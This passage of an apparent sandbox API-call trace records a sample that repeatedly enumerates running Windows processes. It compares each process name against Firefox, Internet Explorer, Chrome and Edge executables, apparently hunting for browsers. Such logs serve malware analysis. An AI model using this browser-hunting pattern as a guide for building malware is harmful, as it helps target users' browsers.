th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0174.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0174.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0174.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0174.839] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.839] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0174.839] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0174.839] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0174.839] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0174.839] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.839] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0174.840] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0174.840] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0174.840] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0174.840] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0174.840] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0174.840] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0174.840] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0174.840] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0174.841] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0174.841] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0174.841] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0174.841] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0174.841] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0174.841] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0174.842] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0174.842] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0174.842] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0174.842] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0174.842] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0174.842] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0174.843] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0174.843] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0174.843] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0174.843] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.843] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0174.843] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0174.843] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0174.843] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0174.844] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0174.844] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0174.844] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0174.844] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.845] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.845] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.845] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.845] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0174.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0174.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0174.846] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.846] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.847] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.847] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.847] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.847] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0174.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0174.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0174.847] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0174.848] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0174.848] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0174.848] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0174.848] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.848] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.848] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.848] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.848] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.849] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.849] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.849] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.849] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.849] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.849] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0174.850] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0174.851] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0174.851] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0174.851] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0174.851] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0174.851] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0174.851] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0174.851] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0174.851] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0174.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0174.852] CloseHandle (hObject=0xd4) returned 1 [0174.852] Sleep (dwMilliseconds=0x3e8) [0175.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0175.897] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.897] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0175.897] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0175.897] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0175.897] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0175.897] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0175.898] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0175.898] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0175.898] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0175.898] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0175.898] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0175.899] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0175.899] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0175.899] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0175.899] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.899] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.899] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0175.899] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0175.899] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0175.899] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.899] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0175.900] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0175.900] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0175.900] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0175.900] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.900] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0175.900] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0175.900] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0175.900] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0175.900] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.900] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0175.901] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0175.901] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0175.901] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0175.901] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.901] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0175.901] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0175.902] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0175.902] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0175.902] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0175.902] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0175.902] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0175.902] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0175.902] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.902] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0175.903] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0175.903] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0175.903] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0175.903] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.903] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.903] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.903] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.903] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.903] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.904] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.904] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.905] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.905] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.906] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.906] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0175.906] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0175.906] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0175.906] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0175.906] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0175.906] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0175.907] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0175.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, 